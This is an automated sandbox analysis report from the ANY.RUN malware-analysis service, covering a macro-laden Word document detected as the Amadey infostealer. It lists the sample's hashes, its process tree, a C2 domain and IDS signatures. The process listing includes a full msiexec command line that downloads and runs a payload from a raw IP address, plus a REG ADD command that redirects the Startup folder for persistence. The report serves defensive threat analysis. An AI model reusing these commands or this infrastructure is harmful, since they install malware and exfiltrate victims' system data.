analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0bab91b3290a63c14f2bcc134e89c47b520f8e09d97d1771ec2c2506dce0a57e.doc

Full analysis: https://app.any.run/tasks/4dcb5ba3-25e7-46c1-b9ee-631dff6c5992
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: June 19, 2019, 01:29:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
exe-to-msi
trojan
amadey
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Template: Normal.dotm, Last Saved By: 1, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jun 17 21:31:00 2019, Last Saved Time/Date: Mon Jun 17 21:43:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

749042D0832AD213C28D2222A1B403E4

SHA1:

84171E967CF6C9F1DF44F8FAAAA497171146FCAF

SHA256:

0BAB91B3290A63C14F2BCC134E89C47B520F8E09D97D1771EC2C2506DCE0A57E

SSDEEP:

3072:lr9qO4vcaSVmX1mnUaghvw5tyOM89g0hBh8/Km6pgVu+:TqO6caSn9ghY5t7hjhBh8imH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2948)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2948)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3892)
    • Application was dropped or rewritten from another process

      • hkmoov.exe (PID: 3424)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3892)
    • Changes the Startup folder

      • REG.exe (PID: 3060)
    • AMADEY was detected

      • hkmoov.exe (PID: 3424)
    • Connects to CnC server

      • hkmoov.exe (PID: 3424)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3892)
      • MSI1D28.tmp (PID: 2896)
    • Starts itself from another location

      • MSI1D28.tmp (PID: 2896)
    • Creates files in the program directory

      • MSI1D28.tmp (PID: 2896)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3892)
    • Uses REG.EXE to modify Windows registry

      • hkmoov.exe (PID: 3424)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3892)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3892)
    • Application was dropped or rewritten from another process

      • MSI1D28.tmp (PID: 2896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (35.9)
.xls | Microsoft Excel sheet (33.7)
.doc | Microsoft Word document (old ver.) (21.3)

EXIF

FlashPix

Title: -
Subject: -
Author: Microsoft Office
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: 1
RevisionNumber: 4
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:06:17 20:31:00
ModifyDate: 2019:06:17 20:43:00
Pages: 1
Words: 4
Characters: 29
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msi1d28.tmp #AMADEY hkmoov.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0bab91b3290a63c14f2bcc134e89c47b520f8e09d97d1771ec2c2506dce0a57e.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3292msiexec /q step1=commonl step2=files /i http://195.123.245.185/04mC:\Windows\system32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3892C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2896"C:\Windows\Installer\MSI1D28.tmp"C:\Windows\Installer\MSI1D28.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3424c:\programdata\d61e6e07ea\hkmoov.exec:\programdata\d61e6e07ea\hkmoov.exe
MSI1D28.tmp
User:
admin
Integrity Level:
MEDIUM
3060REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\d61e6e07eaC:\Windows\system32\REG.exe
hkmoov.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 322
Read events
887
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREDD.tmp.cvr
MD5:
SHA256:
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFCAE0E73810BC0125.TMP
MD5:
SHA256:
3892msiexec.exeC:\Windows\Installer\MSI1BED.tmp
MD5:
SHA256:
3892msiexec.exeC:\Windows\Installer\MSI1D28.tmp
MD5:
SHA256:
2896MSI1D28.tmpC:\ProgramData\0
MD5:
SHA256:
2896MSI1D28.tmpC:\programdata\d61e6e07ea\hkmoov.exe:Zone.Identifier
MD5:
SHA256:
3892msiexec.exeC:\Config.Msi\121b52.rbs
MD5:
SHA256:
3424hkmoov.exeC:\ProgramData\0
MD5:
SHA256:
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF77A99CD65936A50B.TMP
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:DA763423C916A8C5B531387C3E90991E
SHA256:96A437540D5C35796B7D659CE788F6E5802C13086FF4DF09D39BB713E4613D2E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3892
msiexec.exe
GET
200
195.123.245.185:80
http://195.123.245.185/04m
UA
executable
80.0 Kb
suspicious
3424
hkmoov.exe
POST
200
77.30.138.166:80
http://safegross.com/ppk/index.php
SA
text
6 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3424
hkmoov.exe
77.30.138.166:80
safegross.com
Saudi Telecom Company JSC
SA
malicious
3892
msiexec.exe
195.123.245.185:80
UA
suspicious

DNS requests

Domain
IP
Reputation
safegross.com
  • 77.30.138.166
  • 197.255.225.249
  • 91.201.175.46
  • 186.87.135.97
  • 81.12.175.59
  • 193.33.1.18
  • 78.90.243.124
  • 213.222.130.75
  • 203.91.116.53
  • 37.75.33.242
malicious

Threats

PID
Process
Class
Message
3892
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3892
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3424
hkmoov.exe
A Network Trojan was detected
AV TROJAN Agent.DHOA System Info Exfiltration
3424
hkmoov.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3424
hkmoov.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
2 ETPRO signatures available at the full report
No debug info